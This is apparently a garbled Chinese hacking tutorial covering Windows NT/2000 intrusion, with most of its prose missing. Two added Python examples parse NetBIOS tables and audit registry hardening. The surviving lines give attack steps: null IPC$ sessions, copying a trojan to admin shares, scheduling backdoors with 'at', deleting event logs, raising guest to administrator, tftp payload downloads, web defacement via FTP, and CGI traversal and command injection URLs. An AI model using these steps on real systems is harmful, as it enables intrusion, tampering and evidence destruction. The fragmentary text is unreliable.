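    ("01", "GROUP"): "master browser (__MSBROWSE__)",
}

ROW_RE = re.compile(r"^\s*(\S.*?)\s*<([0-9A-Fa-f]{2})>\s+(UNIQUE|GROUP)\s+(\w+)\s*$")
MAC_RE = re.compile(r"MAC Address\s*=\s*([0-9A-Fa-f]{2}(?:-[0-9A-Fa-f]{2}){5})")


def parse_name_table(text):
    """Return ([(name, suffix, type, status), ...], mac_or_None)."""
    rows, mac = [], None
    for line in text.splitlines():
        m = ROW_RE.match(line)
        if m:
            name, suffix, kind, status = m.groups()
            rows.append((name, suffix.upper(), kind, status))
            continue
        m = MAC_RE.search(line)
        if m:
            mac = m.group(1).upper()
    return rows, mac


def describe(rows):
    """Human-readable meaning of each row (unknown suffixes reported as such)."""
    return [(name, suffix, kind, SUFFIX_MEANING.get((suffix, kind), "unknown suffix"))
            for name, suffix, kind, _status in rows]


def summarize(rows, mac):
    """Extract what the table gives away about the host."""
    info = {"computer": None, "domain": None, "users": [], "file_server": False,
            "domain_controller": False, "master_browser": False, "iis": False, "mac": mac}
    for name, suffix, kind, _status in rows:
        if suffix == "00" and kind == "UNIQUE":
            if name.startswith("IS~"):
                info["iis"] = True          # IIS registers IS~<computername><00>
            elif info["computer"] is None:
                info["computer"] = name
        elif suffix == "00" and kind == "GROUP" and info["domain"] is None:
            info["domain"] = name
        elif suffix == "20" and kind == "UNIQUE":
            info["file_server"] = True
        elif suffix == "1C" and kind == "GROUP" and name != "INet~Services":
            info["domain_controller"] = True
        elif suffix == "1D" and kind == "UNIQUE":
            info["master_browser"] = True
    # A <03> UNIQUE name that is not the computer name is a logged-on user.
    for name, suffix, kind, _status in rows:
        if suffix == "03" and kind == "UNIQUE" and name != info["computer"]:
            info["users"].append(name)
    return info


if __name__ == "__main__":
    rows, mac = parse_name_table(SAMPLE_NBTSTAT)
    for name, suffix, kind, meaning in describe(rows):
        print("%-16s <%s> %-6s %s" % (name, suffix, kind, meaning))
    print(summarize(rows, mac))
```

The `<20>` row is what makes the `net use \\IP\ipc$` and `net view \\IP` steps that follow worth trying; its absence means the Server service is not exposed over NetBIOS on that address. Everything this table reveals is available to an unauthenticated sender, which is the reason the hardening section later recommends disabling NetBIOS over TCP/IP where it is not needed.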
8Shutdown
NT
shutdown \\IP /t:20
20 NT
Telnet
shutdown -m \\
9DIR
10echo
Unicode
index.htm 2
echo >index.htm
echo >>index.htm
index.htm
index.htm
index.htm
>> >
FTP
cnhack
test
get index.htm c:\inetpub\wwwroot\index.htm
index.htm
c:\inetpub\wwwroot\index.htm
bye FTP 98 DOSEXIT DOS
echo
get
index.htm
c:\inetpub\wwwroot\index.htm+>>+c:\cnhack.txt
ftp -s:c:\cnhack.txt
ftp -s
cnhack.txt
del c:\cnhack.txt
11:attrib
attrib -r index.htm
index.htm
-+
---------------------attrib +r index.htm
index.htm
12:del
127.0.0.1
NT
del C:\winnt\system32\logfiles\*.*
del C:\winnt\system32\config\*.evt
del C:\winnt\system32\dtclog\*.*
del C:\winnt\system32\*.log
del C:\winnt\system32\*.txt
del C:\winnt\*.txt
del C:\winnt\*.log
NT
D C
6
1
net use \\IP\ipc$ "" /user:""
ipc$
NT
everyone 2000
2. IPC$
1. nt/2000/xp ipc$ 98/me
"
""
3
5
51Windows :
53
ip lanmanserver
67
lanmanworkstation ipc$
1219
ipc$
1326
1792
NetLogon
2242
4 ipc$
shell
5 IPC$
ipc$ shell sql cmd telnet
shell admin
6
net use z: \\IP\c$ "" /user:""
(maps the remote C: drive to local drive Z:)
ipc$ IP $ copy
copy muma.exe \\IP\d$\path\muma.exe
net use y: \\IP\d$
copy muma.exe y:\path\muma.exe
""
7 ipc$
net use \\IP\ipc$ /del
net use z: /del z
net use * /del y
8 ipc$
ipc$
pstools
Win2000SrvReskittelnethack
tftpftp dwrccVNCRemoteAdmin
2000server
9 ipc$
A ipc$
1
net share ipc$ /del
net share admin$ /del
net share c$ /del
regedit
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa]
RestrictAnonymous  DWORD  00000002
3
server
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]
AutoShareServer  DWORD  00000000
pro
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]
AutoShareWks  DWORD  00000000
B ipc$
net stop lanmanserver
XXX
lanmanserver y
C ipc$
ipc$
D
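The hardening steps above (delete the `ipc$`, `admin$` and drive shares, set `RestrictAnonymous`, and set `AutoShareServer` or `AutoShareWks` so the shares are not recreated at boot) are easy to apply and easy to lose. The following is an added example, not code from the original tutorial: it parses a `reg export` file and reports every value that deviates from that baseline. The `.reg` text is a constructed sample of an un-hardened server; on a real host the two keys are exported with `reg export` of `HKLM\SYSTEM\CurrentControlSet\Control\Lsa` and of `HKLM\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters`.

```python
"""Audit a ``reg export`` file for the IPC$/anonymous-access hardening values.

Added example, not code from the original tutorial. It checks the three
registry values the page recommends (RestrictAnonymous = 2; AutoShareServer
or AutoShareWks = 0). The .reg text is a constructed sample.
"""
import re

# Constructed .reg export (REGEDIT5 format) of an un-hardened Windows server.
SAMPLE_REG = """\
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Lsa]
"RestrictAnonymous"=dword:00000000
"LmCompatibilityLevel"=dword:00000001

[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\LanmanServer\\Parameters]
"AutoShareServer"=dword:00000001
"NullSessionPipes"=hex(7):00,00
"""

KEY_RE = re.compile(r"^\[(.+)\]\s*$")
DWORD_RE = re.compile(r'^"([^"]+)"=dword:([0-9a-fA-F]{8})\s*$')

LSA = r"hkey_local_machine\system\currentcontrolset\control\lsa"
SRV = r"hkey_local_machine\system\currentcontrolset\services\lanmanserver\parameters"

# (key, value name, required value); names are compared case-insensitively.
# A value that is absent means the Windows default applies: anonymous
# enumeration allowed, administrative shares re-created at every boot.
BASELINE = [
    (LSA, "restrictanonymous", 2),
    (SRV, "autoshareserver", 0),   # Windows 2000 Server
    (SRV, "autosharewks", 0),      # Windows 2000 Professional / XP
]


def parse_reg_dwords(text):
    """Return {(key_lower, value_name_lower): int} for every DWORD in a .reg file."""
    values, key = {}, None
    for line in text.splitlines():
        m = KEY_RE.match(line)
        if m:
            key = m.group(1).lower()
            continue
        m = DWORD_RE.match(line)
        if m and key is not None:
            values[(key, m.group(1).lower())] = int(m.group(2), 16)
    return values


def audit(values, is_server=True):
    """Return [(value_name, actual_or_None, required)] for every deviation."""
    findings = []
    for key, name, required in BASELINE:
        if name == "autoshareserver" and not is_server:
            continue  # Professional uses AutoShareWks instead
        if name == "autosharewks" and is_server:
            continue  # Server uses AutoShareServer instead
        actual = values.get((key, name))
        if actual != required:
            findings.append((name, actual, required))
    return findings


if __name__ == "__main__":
    for name, actual, required in audit(parse_reg_dwords(SAMPLE_REG), is_server=True):
        print("%s is %r, expected %d" % (name, actual, required))
```

Two caveats a practitioner needs: `net share x$ /del` only lasts until the Server service restarts, which is why the AutoShare values matter; and `RestrictAnonymous=2` on Windows 2000 also blocks legitimate clients (trust enumeration, browsing), while Windows XP/2003 no longer honour the value 2 and use `RestrictAnonymousSAM` and `EveryoneIncludesAnonymous` instead, so the baseline must be adjusted for those versions.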
WAP
RFC1459 IRC
DCC
UNIXLinuxMacBSDWindows2000Windows95/98/MeWindows NT
Linux
Apache
Windows2000 Ftpd
ftp
IP
IP IP
IP
IP
IP IP
IP
IP
65535 65535
80
IRC
6667
1026
Perl
IP
DES
1
Internet: International Net
1969
Internet
(Email) (Telnet)
(Finger)(FTP)(Archive)
(Usenet)
Internet
Remote Login: ()
Internet
FTP
Gopher: guf()
Internet
FTP() Telnet(IP )
Internet
WAIS
Wide Area Information Service
Internet
Listserv: Internet
IRCInternet Relay Chat,
Hypertext:
( )
Hyperlink:
WWW
HTML
(Home Page)
HTML
HTML WWW
Hypermedia:
IEInternet Explorer,Explorer
2
VF
Fox
Pro Progress
VCVisual C C
C BASIC
C
VBVisual Basic
BASIC Beginners' All-purpose Symbolic Instruction Code (
Delphidelfai
(Borland)
Java
/dav()
(Sun)Java
Internet
)
PC UNIX
PDA()
SQLStructure Query Language
SQL
3
PCPersonal Computer
MMX CPU ()
MHz Mega
Hertz MMXTM
TM Trade Mark
OOP: Object Oriented Programming,
28VGA: 28 ()
100
VGA Video
Graphics Array()
FAT: File Allocation Table,
()
EPA EPA POLLUTION
PREVENTER
IC Intelligent Card,
ATX
IDE
DLLDynamic Link Library,
KBKilo ByteKB K=Kilo
B=Byte (
)
MBMega ByteMB M=Mega
GBGiga Byte,GB G=Giga
CAI: Computer-Assisted Instruction / Computer-Aided Instruction,
CADComputerAided Design
ISO: International Organization for Standardization, ISO
1987 ISO 9000 1994
ISO 9000
1.ISO 9000-1:1994
2.ISO 9001:1994
3.ISO 9002:1994
3DS 3D Studio: Three Dimension Studio,
Autodesk
AutoCAD
VGA
VRVirtual Reality 3D
OCR
OCR TH
OCR NT for Windows
SCSISmall Computer System Interface,
Window98
PNP PC
(IRQ) (DMA)
Windows98 IRQ
DMA
OLEObject Linking and Embedding, OLE
OLE
()
(Component Object Model), COMOLE
MIDI
MIDI MIDI
(FM )
MPEG
Motion Picture Experts Group
MPEG MPEG
MPEG
MPEG
10
ADSL
ADSL: Asymmetric Digital Subscriber Loop
640Kbps
7Mbps
1.
2.
3.
4.
5. INTERNET
INTERNET
MODEM
INTERNET
ADSL
ASP
ASP Active Server Pages
HTML
ASP CGI
Web
Internet
Web Web
Web Web
B2B
www.Alibaba.com
B2B
B2C
Internet
www.amazon.comwww.1hao.com
BBS
BBS
BBS Unix WWW BBS Unix
BBS Telnet BBS
BBS BBSbbs.gznet.com
CNNIC
CNNIC 1997 6 3
CNNIC
CNNIC
CNNIC CNNIC
CNNIC
CIO
CIO Chief Information Officer
CTO
CTO Chief Technology Officer
COO
COO Chief Operating Officer
CFO
CFO Chief Financial Officer
CGO
CGO Chief Government Officer
Plug-in
Web
DDN
DDNDigital Data NetworkDDN
A B
DDN
N*64k 2M
DDN
1"
"
POS
2"
"
3
EC E-Commerce
Internet
BtoB B2B
BtoC B2C CtoC
C2C CtoB C2B
www.Alibaba.comwww.8848.netwww.1hao.com
E-mail
E-mail
Email yourname@xxx.xxx
yourname@yahoo.com
@ at
Internet
E-mail Internet
Internet E-mail
www.163.net
FTP
FTP File Transfer Protocol Internet
Internet
Internet
FTP CuteFTP
FTP
FAQ
FAQ Frequently Asked Questions
FAQ
Firewall
Homepage
Homepage Pages
Homepages Pages
www.microsoft.comwww.ibm.com
Homepage
Homepage Pages
Homepages Pages
Supercool.163.netcarboy.163.net
HTTP
HTTPHypertext Transfer Protocol WWW
WWW HTTP TCP/IP
Hacker
Internet
Internet 70
ARPA
Internet
LANMAN
WAN
Internet
Internet
ISP
ISPInternet Service Provider Internet
ISP InternetISP
ISP
ICP
ICP
ICQ
ICQ I seek you
ICQ www.icq.com
IP
IP Internet
IP 32
202.112.223.12
IP ABC IP
IP
ABC
0.0.0.0-127.255.255.255
128.0.0.0-191.255.255.255
192.0.0.0-223.255.255.255
IP
IP
NIC Internet
IP
IP
IP VoIPVoice over Internet protocol
Internet
VocalTec
163
163
163
Modem 163
www.163.com
163 www.163.net
ISOC
ISOCInternet Society
1992 (
)
(IAB)
(IETF) (IESG)
(IEPG) (IANA)
Intranet
Internet
Internet
Web Web
FTP Internet
wideband transmission
20
Browser
WWW
WWW
Offline
WWW
MODEM
MODEM
Modem
Modem
Modem
POP3
POP3 Post Office Protocol version 3 3
POP3
SMTP
SMTP Simple Mail Transfer Protocol
SMTP
WWW
WWW
www.yahoo.comwww.sohu.com
Upload
Download Down
SET
SET Secure Electronic Transaction VISA
MasterCard 1997 5 SET
SET
SET SSL
SSL
SSL Secure Socket Layer Netscape
SSL SSL
SQL
SQL sequel S-Q-L
MICROSOFT
WAP
WAP
Nokia 7110, Siemens 3568i, Motorola A6188
WWW
WWW World Wide Web
Web
WWW
News FTP
Telnet Gopher Mail
www.sina.com.cnwww.163.com
WWW
Web
ServerFTP ServerMail Server
Database Server
www.yahoo.comwww.163.net
TCP/IP IPX/SPX
NetBIOS TCP/IP
Internet
BBS Fido
Internet WWWFTPEmail
32
IP Internet
www.cctv.com Internet
.com .net
.edu .gov().mil .org
cnus
ukhksupercool.163.net
ISDN
2 64Kbps
128Kbps
Internet Internet
Online
Payment Gateway Internet
Internet
Internet
11
[hacker]
(hacker) hack
()
50
6070
(password cracking)
(trapdoor)(backdoor)(Trojan horse)
"",.
.
"",.
() Trojan house
[]
,,
!
, ,
, ,
,.
rootkit
Rootkit rootkit
wtmputmp lastlog rootkit
telnetshell finger
/var/log /var/adm
,
,.
IPC$
IPC$(Internet Process Connection) " "
IPC$ NT/2000 IP
NT/2000 ipc$
(c$,d$,e$ )
winnt
windows(admin$)
[],
Windows 2000/XP/2003
$
C$D$E$ Winnt Windows[admin$]
shell
shellshell
shell :
webshell
webshell ( ) WEB
WEB
,
"".
,.
[]
http://www.xxx.com/soft.asp?id=123
domain d
1. WHOIS
2.
3.
webshell
4.
:Serv-u IIS
LOG
5. Admin )
6. ASP
[]
,,?
,
VIP
.,
, . ,
, VIP
,.
?
Computer Virus
?
clientserver
?
Firewall
?
Back Door
NIDS
NIDS Network Intrusion Detection System
Hacker Cracker
NIDS
Hub
SYN ?
TCP SYN
?
Worm1988 22
Robert Morris
UNIX Worm 6000
200 6000
CERT
99
Unix
Finger
Mail
DDoS
DDoS
ARP
ARP IP
MAC
ARP
ARP Mac
ARP
:
1. XXX XXX
2.
ARP
:HONEYPOT HONEYPOT
:IP ARP DNS Web
12
135137138139445
?
192.***.xx.x
IP 4
45
Standard: Solaris 2.x, Linux 2.1.???, Linux 2.2, MacOS
Telnet (23/tcp)
ssh (22/tcp)
ftp (21/tcp) (
)
netstat (15/tcp)
daytime (13/tcp)
systat (11/tcp)
echo (7/tcp)
time (37/tcp)
smtp (25/tcp)
www (80/tcp) (
)
finger (79/tcp)
auth (113/tcp)
sunrpc (111/tcp)
pop-2 (109/tcp)
linuxconf (98/tcp)
imap2 (143/tcp)
printer (515/tcp)
shell (514/tcp)
login (513/tcp)
exec (512/tcp)
unknown (693/tcp)
unknown (698/tcp)
unknown (727/tcp)
swat (910/tcp)
unknown (1025/tcp)
unknown (1039/tcp)
unknown (1038/tcp)
unknown (1037/tcp)
unknown (1035/tcp)
unknown (1034/tcp)
unknown (3001/tcp)
unknown (6000/tcp)
echo (7/udp)
general/tcp
daytime (13/udp)
unknown (728/udp) (
)
unknown (2049/udp)
unknown (681/udp)
unknown (2049/tcp)(
)
telnet (23/tcp)
(21/tcp)
/incoming
ftp
(21/tcp)
ftp TELNET
CWD ~XXXX CWD ROOT
(guest),
13/tcp (daytime)
udp
UDP
ECHO(7/tcp)
(25/tcp)smtp
EXPN VRFY
EXPN
VRFY
user@hostname1@victim
user@hostname1
WWW(80/TCP)
WWW
finger (79/tcp)
finger
auth (113/tcp)
ident
(
ROOT )
(98/tcp) LINUX
(513/tcp) RLOGIN
TELNET
exec (512/tcp)
rexecd ,
IP
UNIX UNIX 0
WIN2000
WIN2K
230M
PING
5.0 GOOGLE N
NSS
NSS Perl
Sendmail
FTP
NFS
TFTP
Hosts.equiv
Xhost
NSS Hosts.equiv
NSS
AppleTalk
Novell
LAN
NSS
Ping
NSS
NSS NSS
$TmpDir_NSS
$YPX-ypx
$PING_ ping
$XWININFO_xwininfo
Perl include
Perl include
PATH
NSS ftplib.pl NSS
NSS
NSS
NSS
http://www.giga.or.at/pub/hacker/unix
Strobe TCP
strobe TCP strobe
strobe
strobe strobe
strobe
socket
strobe
strobe Solaris 2.3
getpeername()
-g
strobe
ISS strobe
/var/adm/messages
SATAN
SATAN UNIX C Perl
HTML UNIX
Linux SATAN
Linux tcp-scan
select()
fping
socket
Linux SATAN diff
ftp.lod.com
Sun sunsite.unc.edu diff
/pub/linux/system/network/admin/satan-linux.1.1.1.diff.gz
SATAN
FTPD
FTP
NFS
NIS
RSH
Sendmail
X
SATAN http://www.fish.com
SATAN SATAN
/satan-1.1.1 Perl
reconfig
PATH DNS
DNS /satan-1.1.1/conf/satan.cf
$dont_use_nslookup=1
IRIX SunOS
SATAN
SATAN
100
SATAN
Jakal
Jakal
half scans
SYN/ACK
Courtney, Gabriel
Half lifeJeff(PhiJi)Fay Abdullah Marahie
Jakal http://www.giga.or.at/pub/hacker/unix
IdentTCPscan
IdentTCPscan TCP
UID
.CONNECT
CONNECT bin/sh
TFTP
FSPScan
FSPScan
FSP
FSP *FSP
FTP FTP
E-mail FSP
XSCAN
XSCAN
SSSShadow
Security Scanner
http://www.20cn.net/cgi-bin/download/down.cgi?list=scaner
SSS
NMAP
http://www.91one.net/dvbbs/dispbbs.asp?boardid=17&id=1362&star=1#1362
PING
shellshell UNIX
xx
SHELL
http://www.91one.net/dvbbs/dispbbs.asp?boardid=17&id=1426
,
shell telnetshell
telnet
winshell
http://978229.myrice.com/tty/Preview.htm#MAILLISTDOC19
shell
Win2K
http://www.yesky.com/20010530/182273.shtml ;
Microsoft
SQL
Server
Webtasks
http://www.mhdn.net/se/2002-11-08/6386.html
Linux
kernel
ptrace
http://www.softhouse.com.cn/docs/southpark2169.html
IIS
http://moon-soft.com/e_commerce/soft/doc/readelite572760.htm
win2000
D
shell
Shell ?
UNIX
Shell(DOS command UNIX )Shell
dos
command.com
shell
http://www.91one.net/dvbbs/dispbbs.asp?boardid=17&id=769
13
3389
3389
3389
(
scanner3.0 xscan scanner IP
scanner 3389
IP
3389 IP
IP TXT
xscan
SQL-Server NT-Server
IP TXT
3.0 mstsc
cmd.exenet use
net view\\
!
Windows Macintosh UNIX
*
Windows
Windows
Windows 2000
Windows 2000 Professional
Windows 2000
Windows 2000
MS-DOS Windows
Macintosh
UNIX
MS-DOSMacintosh UNIX
Windows 2000 Server
Windows 2000 Server
(DFS) (DFS)
DFS DFS
Windows 2000
Server
Windows 2000 Server Active Directory
Windows 2000 Server
40 128 128
TCP/IP
RDP-TCP
RDP RDP
RDP-TCP
/ Internet
Citrix CA
Citrix CA Citrix CA
Citrix CA TCP/IP
IPX/SPX
NetBIOS
3389
3389 . 3389
,M$
, :winnt4/win2000server/win2000ADVserver/win2000DS/XP .
winnt4
,2000 ,.
, win2000server server .(
).
..
: 192.168.0.1
: administrator
: 7788
2000
c:\winnt
,2000 ,
.
: c:\>letmein \\192.168.0.1 -all -d
stating connecting to server ...
Server local time is: 2002-1-13 10:19:22
Start get all users FORM server...
-------------------------Total = 5
-------------------------num0= Administrator ()
num1= Guest ()
num2= IUSR_servername (Internet )
num3= IWAM_servername ( IIS )
num4= TsInternetUser (TsInternetUser)
-------------------------Total = 5
-------------------------- num2/3/4 2000server
.
2000 .
:
:superscan3.exe
25,3372 2000server .
,
:cmdinfo.zip
2 NT/2K
,
,
,PACK ,
, ,
.
.
,:,
, .
3 ,
,
cmdinfo
2000 , 3389 .
? :?3389
, ,
3389
?
1.
termservice "
">>>""
.
2.
RDP "
">>>""
.
3.
3389 . 3389
4..
5.
.
6.....(
)
, 5 .
.,
C Z
net use z: \\192.168.0.1\c$ "7788" /user:"administrator"
Z
,
Z:\Documents and Settings\All Users\\\
>
"
"""
,,(98% )
telnet .,
,
:
telnet , ., 2000
telnet ,
,.(~,!)
,.
.abu. WIN2K TELNET
,
(
,),
telnet .
23
,
telnet 192.168.0.1
/
*===============================================================
Microsoft Telnet
*===============================================================
C:\>
\\
!!!! ,
:
c:\>query user
. .
:
USERNAME SESSIONNAME ID STATE IDLE TIME LOGON TIME
>w1 console 0 .2002-1-12 22:5
\\,
.!,
.
--------------------------------------------------
C:\>dir c:\sysoc.inf /s // INF
c:\WINNT\inf 2000-01-10 20:00 3,770 sysoc.inf
1 3,770
----------------------------------------------------
C:\> dir c:\sysocmgr.* /s //
c:\WINNT\system32 2000-01-10 20:00 42,768 sysocmgr.exe
1 42,768
----------------------------------------------------
c:\>echo [Components] > c:\wawa
c:\>echo TSEnable = on >> c:\wawa
//
c:\>type c:\wawa
[Components]
TSEnable = on
//
/R
.,,
,
3389 ..
: A
,/R,
,
:iisreset /reboot
,
, , .B
, .C sysocmgr
,
,, sysocmgr ,,
.,
B .
C ,?
( )
WIN2000
WIN2000
WIN2000
WIN2000
3389
WIN2000
WIN2000
3389
WIN2000
CTRL+SHIFT
URL
WIN2000
"c:\winnt\system32"
SYSTEM32
"net.exe""net.exe"
> >c:\winnt\system32\net.exe "user guest
/active :yes" net.exe
guest
"user add"
guest
"user guest " guest
localgroup administrators guest /add guest
id
ip
"guest" guest
Microsoft
Telnet
Tools Srv.exe, ntlm.exe
Telnet
99
copy c:\hack\srv.exe \\***.***.***.***\admin$
srv.exe:
at \\***.***.***.*** 09:00 srv.exe
ID = 0
telnet ***.***.***.*** 99
c:\winnt\system32>
23 guest
net.exe winnt\system32\logfiles
14
http://www.91one.net/dvbbs/dispbbs.asp?boardID=14&ID=403
Port Mapping
Internet
Internet FTP
IP IP
IP
Internet IP IP
Internet
PM
http://www.pconline.com.cn/pcedu/soft/lan/jywgl/10301/127157.html
Remote Administrator
http://www.pcworld.com.cn/2002/back_issues/2205/0533e.asp
http://www.skycn.com/soft/15592.html
20cn
scanipc
http://down.yqdown.com/xdown/yqdown0316/scanipc.rar
IP
opentelnet TELNET
http://www.infosw.com/down/software.asp?id=1520
telnet
, 23 !
Opentelnet :
OpenTelnet.exe \\server <> <>
:
C:\>OpenTelnet.exe \\192.168.1.2 administrator 123456 1 90
administrator 123456
NTLM
:1( 0 )
90
Disconnecting server...Successfully!
90
Telnet
Telnet 192.168.1.2 90
WinShell(
http://www.hktk.com/soft/soft_server/winshell.html) winshell
FTP
:
c:\>ftp
ftp> open www.cnwill.com
mput c:\cnwill.exe
Telnet 192.168.1.2 90
( )
net
long
[ , ]
15
telnet
telnet,,,
*, telnet ,
telnet, telnet?Telnet /
Telnet
?
, : Telnet
Telnet
Telnet
Ip
Telnet 4
1 TCP
Ip
2
NVTNet Virtual Terminal
IP
3 NVT
4 TCP
Internet
Telnet
1Telnet
2Telnet
3Telnet Telnet
,,,
Telnet HELP
Telnet
AllowTrustedDomain 1
0:
DefaultDomain
"."
DefaultShell shell %systemroot%\System32\Cmd.exe /q /k
MaxFailedLogins
3
LoginScriptTelnet
%systemroot%\System32\login.cmd
Telnet
NTLMNTLM 2
0: NTLM
1: NTLM
2: NTLM
TelnetPorttelnet
telnet 23
tlntadmn.exeTelnet
Telnet 1
2 NTLM
telnet NTLM
NTLM win2000
telnet
NTLM NTLM
NTLM
SMB "LAN Manager Challenge/Response" LM
WindowsNT / NTLM
NTLMv2 Kerberos
NTLM
1
2
3 16
challenge
4 challenge
response
5 challenge
response
6 SAM
challenge
7
challenge
NTLM
Telnet
A B
A xinxin 1234 B
Administrator 5678 Telnet B NTLM
7 xinxin 1234
Administrator 5678
Telnet NTLM
3 Telnet
1)
=0
=====================================
Microsoft (R) Windows (TM) Version 5.00 (Build 2195)
Welcome to Microsoft Telnet Service
Telnet Server Build 5.00.99201.1
login:
password:
\\ 0 NTLM
Administrator 5678
2)
=1
=====================================
NTLM Authentication failed due to insufficient credentials. Please login with clear text username and password
Microsoft (R) Windows (TM) Version 5.00 (Build 2195)
Welcome to Microsoft Telnet Service
Telnet Server Build 5.00.99201.1
login:
password:
\\ NTLM
3)
=2
=====================================
NTLM Authentication failed due to insufficient credentials.Please
C:\>
\\
NTLM
1 telnet 2 1
0
2 NTLM.exe telnet
1
3 telnet
4 opentelnet.exe
IPC
5 RTCS
IPC
5
telnet
OpenTelnet.exe
\\server
username
password
NTLMAuthor
telnetport
OpenTelnet.exe \\
0 1 telnet
>
telnet ? ,
1
,,
1
type
c:\boot.ini pro server
2 tftp
telnet ipc
net share ipc$
copy
shell(
)TFPT TFTP
TFTP(Trivial File Transfer Protocol)
UDP Windows tftp.exe TFTP
TFTP Server
tftpd32.exe telnet
shell
C:\>tftp -i ip get xinxin.exe c:\abc\xinxin.exe
ip ip TFTP
xinxin.exe c abc
tftp
IP
IP
MAC
TFTP
3
, .
asp
telnettelnet shell
( copy ,)
1
cmd telnet
3389
'hacking'
ipc$
5
()
,,,
16
2
SID ,
SAM\Domains\Account \Users F
admin F F
SAM
http://www.91one.net/dvbbs/dispbbs.asp?boardid=17&id=1427
ca.exe
http://www.hejie.net/xz/list.asp?id=926
SYSTEM
psu.exe
www.sometips.com/soft/psu.exe
17
PING
ping
C:\>ping 10.1.1.2
Pinging 10.1.1.2 with 32 bytes of data:
Reply from 10.1.1.2: bytes=32 time<10ms TTL=128
Reply from 10.1.1.2: bytes=32 time<10ms TTL=128
Reply from 10.1.1.2: bytes=32 time<10ms TTL=128
Reply from 10.1.1.2: bytes=32 time<10ms TTL=128
Ping statistics for 10.1.1.2:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 0ms, Maximum = 0ms, Average = 0ms
C:\>
C:\>ping 10.1.1.6
Pinging 10.1.1.6 with 32 bytes of data:
Request timed out.
Reply from 10.1.1.6: bytes=32 time=250ms TTL=237
Reply from 10.1.1.6: bytes=32 time=234ms TTL=237
Reply from 10.1.1.6: bytes=32 time=234ms TTL=237
Ping statistics for 10.1.1.6:
Packets: Sent = 4, Received = 3, Lost = 1 (25% loss),
Approximate round trip times in milli-seconds:
Minimum = 234ms, Maximum = 250ms, Average = 179ms
TTL
1 80
telnet 80
C:\>telnet 10.1.1.2 80
get
C:\>
windows
C:\>
UNIX
2 21
FTP
C:\>ftp 10.1.1.2
Connected to 10.1.1.2.
220 sgyyq-c43s950 Microsoft FTP Service (Version 5.0).
User (10.1.1.2:(none)):
win2000
sgyyq-c43s950
FTP windows IIS FTP
Connected to 10.1.1.3.
220 Serv-U FTP Server v4.0 for WinSock ready...
User (10.1.1.3:(none)):
windows Serv-U FTP windows
FTP
Connected to 10.1.1.3.
220 ready, dude (vsFTPd 1.1.0: beat me, break me)
User (10.1.1.3:(none)):
UNIX
3 23 telnet
SunOS 5.8
login:
UNIX SunOS 5.8
TCP/IP
TCP/IP TCP/IP
nmap,
http://www.linuxeden.com/download/indexsoft.php?category=syssecure
superscan
http://www.xfocus.net/tools/200206/ 1.0.5.zip
18
FTP SQL
FTP FTP
FTP
FTP FTP
FTP
FTP
FTP
UNIX
FTP
^^^)
FTP
FTP
FTP ftp -v -d -i -n -g [
]
-v
-n
ftp .netrc
-d
-g
FTP ():
1.![cmd [args]] shell exit ftp !
ls*.zip
2.$ macro-name [args] macro-name
3.account[password]
4.append local-file[remote-file]
5.ascii
ascii
6.bell
7.bin
8.bye ftp
9.case
mget
10.cd remote-dir
11.cdup
12.chmod mode file-name
file-name
mode chmod 777 a.out
13.close ftp ( open )
14.cr
ascii
15.delete remote-file
16.debug[debug-value]
deb up 3 0 debug
17.dir[remote-dir][local-file]
18.disconnectionclose
19.form format format file
20.get remote-file[local-file]
remote-file
local-file
21.glob mdeletemgetmput
-g
22.hash
1024 hash (#)
23.help[cmd]ftp cmd help get
24.idle[seconds][seconds]
25.image(binary)
26.lcd[dir] dir
27.ls[remote-dir][local-file] remote-dir
local-file
28.macdef macro-name macdef
29.mdelete[remote-file]
30.mdir remote-files local-filedir
mdir *.o *.zip outfile
31.mget remote-files
32.mkdir dir-name
35.modtime file-name
36.mput local-file
38.nlist[remote-dir][local-file]
local-file
39.nmap[inpattern outpattern]
nmap $1.$2.$3[$1$2].[$2$3]
a1.a2.a3 a1a2 UNIX
40.ntrans [inchars [outchars]]
ntrans1R LLL RRR
41.open host[port]ftp
42.passive
43.prompt
44.proxy ftp-cmd
ftp ftp
ftp
open
45.put local-file[remote-file] local-file
46.pwd
47.quitbye ftp
48.quote arg1arg2...
ftp
quote syst.
49.recv remote-file[local-file]get
50.reget remote-file[local-file]
get local-file
51.rhelp[cmd-name]
52.rstatus[file-name]
53.rename[from][to]
54.reset
55.restart marker marker get put restart
130
56.rmdir dir-name
57.runique.
1.2
58.send local-file[remote-file]put
59.sendport PORT
60.site arg1arg2...
SITE ftp
64.sunique( runique )
65.system
66.tenex TENEX
67.tick
68.trace
69.type[type-name] type-name ascii
:type binary
70.umask[newmask]
-v ftp
on.
73.?[cmd]help.
FTP
FTP ,!!
FTP .
anonymous ftp
Anonymous FTP
@ FTP
/etc/passwd /etc/group
FTP FTP
E-mail passwd
@ E-mail
FTP
chroot
FTP FTP
FTPFTP
FTP
chroot
FTP inetd
FTP chroot
chrootuid
FTP
chroot
FTP
FTP
/etc/passwd
telnet ftp21 SITE
CHMOD SITE EXEC/home FTP
****
FTP scanner
http://sorry.vse.cz/~xmicm08/FTPScanner/
FTP Scanner
:Host
,Beginning , IP
IP.Ending IP
. IP.
Threads
. Modem 50--70 .
100
View options
Login config
UserName Password
Oracle
Oracle UserName Password
IP Logging
iplog.txt
ftp> get /etc/passwd
shell OK
anonymous
IP
19
80
80 ,,.
( host
)
1'.' '..' '...'
web web
web
CGI '..'
Example:
http://host/cgi-bin/lame.cgi?file=../../../../etc/motd
motd web
2'%20'
%20 16
web
Example:
http://host/cgi-bin/lame.cgi?page=ls%20-al|
unix
3'%00'
%00 16 web
Examples:
http://host/cgi-bin/lame.cgi?page=index.html
cgi
http://host/cgi-bin/lame.cgi?page=../../../../etc/motd
cgi
html.shtml
http://host/cgi-bin/lame.cgi?page=../../../../etc/motd%00html
cgi
4'|'
unix
Example:
# cat access_log| grep -i '..'
..
web IDS
http://host/cgi-bin/lame.cgi?page=../../../../bin/ls|
http://host/cgi-bin/lame.cgi?page=../../../../bin/ls%20-al%20/etc|
unix /etc
